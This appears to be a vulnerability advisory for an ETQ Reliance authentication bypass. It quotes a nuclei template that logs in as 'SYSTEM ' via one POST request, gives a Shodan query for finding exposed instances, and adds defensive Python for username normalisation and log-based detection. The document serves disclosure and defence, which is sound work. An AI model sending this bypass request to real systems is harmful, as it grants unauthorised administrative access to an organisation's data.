ETQ Reliance Authentication Bypass Vulnerability

Vulnerability Information

Vulnerability name: ETQ Reliance authentication bypass vulnerability

Vulnerability type: Authorization bypass

Severity: Critical

Description: ETQ Reliance is an enterprise-grade quality management software product, widely used in industries such as manufacturing, healthcare and financial services to automate and standardize quality management. It is usually deployed on the enterprise's internal network and runs as a critical business system. The authentication bypass vulnerability described here allows an attacker to obtain the highest level of privilege in the system without a valid password, using a simple username construction trick. Specifically, the attacker only needs to append a space to the username 'SYSTEM' (i.e. 'SYSTEM ') to bypass the authentication mechanism and log in directly as the SYSTEM account. The root cause is improper handling of the username input: the system fails to correctly filter or validate the space character in the username, so the authentication logic is bypassed. Because the SYSTEM account normally holds the highest privileges in the system, an attacker exploiting this vulnerability can take complete control of the affected ETQ Reliance instance and perform arbitrary operations, including viewing, modifying or deleting sensitive data, and can even pivot further into the enterprise intranet. Exploitation requires no preconditions and can be automated, which greatly increases the security risk to affected organizations.

Vendor: ETQ

Product: ETQ Reliance

Search syntax: html:"ETQ Reliance"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/8a43448e7c0822f33b45fc434a328237d4762d85/http%2Fmisconfiguration%2Fetq-reliance-auth-bypass.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details
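The root cause stated above is that a username padded with whitespace is not canonicalised before the authentication logic runs, so "SYSTEM " and "SYSTEM" follow different paths. The following Python is an added illustration written for this page (it is not ETQ's code, nor the vendor's actual fix) of one defensive pattern: map every submitted username to a single canonical form before any lookup, and fail closed on names that still contain whitespace instead of silently trimming them. The `USERS` store, the `canonical_username` and `login` helpers and the normalisation rule are all assumptions made for the example.

```python
import hashlib
import hmac
import re
import unicodedata
from typing import Optional

# Constructed demo user store (not ETQ Reliance's real data model).
# Passwords are stored as SHA-256 digests for brevity; a real deployment
# would use a salted, slow KDF such as Argon2 or bcrypt.
def _digest(pw: str) -> str:
    return hashlib.sha256(pw.encode("utf-8")).hexdigest()


USERS = {
    "system": {"role": "admin", "pw": _digest("correct-horse-battery-staple")},
    "alice": {"role": "user", "pw": _digest("hunter2")},
}

_ANY_WHITESPACE = re.compile(r"\s")


def canonical_username(raw: object) -> Optional[str]:
    """Map a submitted username to its single canonical form, or None.

    Hypothetical rule (an assumption, not the vendor's fix): normalise to
    Unicode NFKC, casefold, and then *reject* any name that still contains
    whitespace instead of stripping it. Rejecting rather than trimming means
    "SYSTEM " and "SYSTEM" can never reach different code paths in the
    authentication logic, which is the defect the advisory describes.
    """
    if not isinstance(raw, str) or not raw:
        return None
    name = unicodedata.normalize("NFKC", raw).casefold()
    if _ANY_WHITESPACE.search(name):
        return None
    return name


def login(raw_username: object, password: str) -> Optional[dict]:
    """Authenticate against USERS; returns a session-like dict or None."""
    key = canonical_username(raw_username)
    if key is None:
        return None  # fail closed before any user-store lookup
    user = USERS.get(key)
    if user is None:
        return None
    # constant-time comparison of the two digests
    if not hmac.compare_digest(user["pw"], _digest(password)):
        return None
    return {"userId": key, "role": user["role"]}


if __name__ == "__main__":
    for attempt in ["SYSTEM", "SYSTEM ", " SYSTEM", "ＳＹＳＴＥＭ"]:
        print(repr(attempt), "->", canonical_username(attempt))
```

NFKC normalisation is included because fullwidth letters and non-breaking spaces are the same class of problem as the trailing ASCII space: any input that is "almost" a privileged name must collapse to exactly one canonical key or be refused outright.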


id: etq-reliance-auth-bypass

info:
  name: ETQ Reliance - Authentication Bypass
  author: assetnote,DhiyaneshDK
  severity: critical
  description: |
    An authentication bypass vulnerability exists in ETQ Reliance's login mechanism, where submitting the SYSTEM username followed by a trailing space ("SYSTEM ") allows unauthenticated users to gain full access as the SYSTEM account. This critical flaw effectively bypasses authentication controls and grants administrative-level access to the application.
  reference:
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  metadata:
    max-request: 1
    shodan-query: html:"ETQ Reliance"
  tags: etq-reliance,auth-bypass

variables:
  username: "SYSTEM "
  password: "{{to_lower(rand_text_alphanumeric(7))}}"

http:
  - raw:
      - |
        POST /reliance/resources/sessions HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "statusCode"
          - "userId"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
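The template above sends a single POST to /reliance/resources/sessions, which is also the request a defender should be watching. The following Python is an added detection example written for this page (not part of the nuclei template or of ETQ's product): it scans an application-level authentication log for session-creation requests whose submitted username carries leading or trailing whitespace, and raises the priority when such a request succeeds against a privileged account. The JSON-lines log format, its field names, the `PRIVILEGED` set and the sample events are all constructed assumptions, not ETQ Reliance's real log schema.

```python
import json
from typing import Dict, List

SESSION_PATH = "/reliance/resources/sessions"   # endpoint from the template
PRIVILEGED = {"SYSTEM"}                          # assumption: accounts to watch

# Constructed sample log: one JSON object per line, mimicking an application
# authentication log that records the username exactly as submitted.
# "\\t" below becomes a literal \t escape in the JSON text, i.e. a tab.
SAMPLE_LOG = """\
{"ts":"2024-05-01T10:00:01Z","src":"10.0.0.5","method":"POST","path":"/reliance/resources/sessions","username":"alice","status":200}
{"ts":"2024-05-01T10:00:07Z","src":"203.0.113.9","method":"POST","path":"/reliance/resources/sessions","username":"SYSTEM ","status":200}
{"ts":"2024-05-01T10:00:09Z","src":"203.0.113.9","method":"POST","path":"/reliance/resources/sessions","username":"SYSTEM","status":401}
{"ts":"2024-05-01T10:01:00Z","src":"10.0.0.8","method":"GET","path":"/reliance/resources/sessions","username":"","status":200}
{"ts":"2024-05-01T10:02:30Z","src":"198.51.100.2","method":"POST","path":"/reliance/resources/sessions","username":"\\tsystem","status":200}
"""


def find_suspicious_logins(log_text: str) -> List[Dict]:
    """Return one alert per session-creation request that looks like the
    whitespace-padding pattern described in the advisory."""
    alerts: List[Dict] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        # Only login attempts (POST to the sessions endpoint) are of interest.
        if ev.get("method") != "POST" or ev.get("path") != SESSION_PATH:
            continue
        name = ev.get("username", "")
        stripped = name.strip()
        reasons = []
        if stripped != name:
            # Any surrounding whitespace is abnormal for a login form.
            reasons.append("whitespace-padded username")
        if stripped.upper() in PRIVILEGED and ev.get("status") == 200:
            reasons.append("successful login to privileged account")
        if not reasons:
            continue
        severity = "high" if len(reasons) == 2 else "medium"
        alerts.append({
            "ts": ev["ts"],
            "src": ev["src"],
            "username": name,
            "status": ev["status"],
            "severity": severity,
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_logins(SAMPLE_LOG):
        print(json.dumps(alert))
```

A padded username that also produced a 200 response is the combination worth paging on; a padded name that was rejected, or a plain successful SYSTEM login, is logged at medium priority so that legitimate administrator activity is still visible without drowning the real signal.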